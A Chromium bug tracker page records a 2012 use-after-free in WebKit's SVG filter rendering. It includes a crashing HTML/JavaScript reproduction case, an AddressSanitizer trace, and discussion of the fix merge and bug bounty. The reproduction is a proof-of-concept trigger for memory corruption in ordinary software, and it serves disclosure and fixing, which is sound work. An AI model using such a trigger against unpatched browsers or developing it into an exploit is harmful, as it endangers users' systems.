New issue
Advanced search Search tips

Issue 156567 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security



Sign in to add a comment

Security: use-after-free in WebCore::GraphicsContext::paintingDisabled

Reported by miau...@gmail.com, Oct 18 2012

Issue description


VULNERABILITY DETAILS
use-after-free in WebCore::GraphicsContext::paintingDisabled

VERSION
Chrome Version: dev

Chromium	24.0.1301.0 (Developer Build 162597) 
OS	Linux 
WebKit	537.16 (@131643)
JavaScript	V8 3.14.4.1

causes infinite recursion in older versions (prior to the other svg bugfix)

Operating System: 64bit ubuntu precise

REPRODUCTION CASE
<html>
  <head>
    <script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElementNS('http://www.w3.org/2000/svg', 'g')
        el1.setAttribute('filter', 'url(#el2)')
        el0.appendChild(el1)
        el2=document.createElementNS('http://www.w3.org/2000/svg', 'filter')
        el2.setAttribute('id','el2')
        el0.appendChild(el2)
        el3=document.createElementNS('http://www.w3.org/2000/svg', 'feImage')
        el3.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
        el2.appendChild(el3)
        document.body.offsetTop
        el0.setAttribute('filter', 'url(#el2)')
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==7986== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffebb2beec at pc 0x55555a030bba bp 0x7fffffff4780 sp 0x7fffffff4778
READ of size 1 at 0x7fffebb2beec thread T0
    #0 0x55555a030bb9 in WebCore::GraphicsContext::paintingDisabled() const ???:0
    #1 0x55555a0abaf2 in WebCore::GraphicsContext::concatCTM(WebCore::AffineTransform const&) ???:0
    #2 0x55555c30a2f9 in WebCore::RenderSVGResourceFilter::postApplyResource(WebCore::RenderObject*, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) ???:0

0x7fffebb2beec is located 108 bytes inside of 144-byte region [0x7fffebb2be80,0x7fffebb2bf10)
freed by thread T0 here:
    #0 0x55555f967df0 in __interceptor_free ??:0
    #1 0x55555a0b2a95 in WebCore::ImageBuffer::~ImageBuffer() ???:0
    #2 0x55555c307e20 in WebCore::RenderSVGResourceFilter::applyResource(WebCore::RenderObject*, WebCore::RenderStyle*, WebCore::GraphicsContext*&, unsigned short) ???:0
    #3 0x55555c04d9dc in WebCore::SVGRenderingContext::prepareToRenderSVGContent(WebCore::RenderObject*, WebCore::PaintInfo&, WebCore::SVGRenderingContext::NeedsGraphicsContextSave) ???:0




 
svg3.html
826 bytes View Download
svg3.txt
19.3 KB View Download
Cc: pdr@chromium.org fmalita@chromium.org
Labels: WebKit-SVG
Owner: schenney@chromium.org
Status: Assigned
Labels: WebKit-ID-94652
Labels: Merge-Requested
Apparently BugDroid failed to pick up that this was fixed in WebKit r132856: <http://trac.webkit.org/changeset/132856>.

Merge requested for m23. Reward?
Status: FixUnreleased
Labels: -Pri-0 -Area-Undefined -Merge-Requested Pri-1 Area-WebKit Merge-Approved reward-topanel Mstone-23 SecImpacts-Stable SecImpacts-Beta Stability-AddressSanitizer
I don't think it will make to m23 stable (needs bake time on trunk), but m23 stable first patch.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify SecSeverity-High
Sorry, I interpret Abhishek's comment to mean don't merge, but the MergeApproved flag is set. Please clarify. :-)

And the Chromium Notifier just IMed me. also apparently upset.

Comment 9 by kareng@google.com, Oct 30 2012

Labels: -Merge-Approved Merge-Requested
please don't merge just now. i'm still in the process of getting a good build. if i read abishek's comment right he's saying we'll take it for stable 2. i will give you heads up as soon as it's ok to merge. chris/abishek, is that ok?

(setting back to requested to i don't lose it.)
Hey Karen, generally, "Merge-Approved" still means we'll wait for you to say it's ok. Security merges are tackled pretty much by myself or Abhishek and we do not fire them off indiscriminately :P
Labels: -Merge-Requested Merge-Approved
Answer to first question: Security bugs have blanket merge approval, we use the flag to keep track of which bugs to merge. But we do the actual merge when the merge window opens (and after letting it bake and checking with the RM)

Answer to second question: ignore that, we need to get that fixed. known issue.

Overall conclusion: Keep fixing awesome bugs, leave the merges to the security team :)

I have talked to Karen and told that we are not merging this to branch right now, but for the next m23 patch.
Labels: -reward-topanel reward-1000 reward-unpaid
$1000 for miaubiz!
Labels: -Merge-Approved Merge-Merged
M23: http://trac.webkit.org/changeset/134258
Labels: -reward-unpaid
Payment in system as part of $3000 batch.
Status: Fixed
Project Member

Comment 18 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-23 -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -SecSeverity-High Cr-Content Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG M-23 Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High
Labels: -Restrict-View-SecurityNotify
Project Member

Comment 20 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 23 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 24 by bugdroid1@chromium.org, Apr 5 2013

Labels: -Cr-Content Cr-Blink
Project Member

Comment 25 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content-SVG Cr-Blink-SVG
Project Member

Comment 27 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 28 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 29 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic

Sign in to add a comment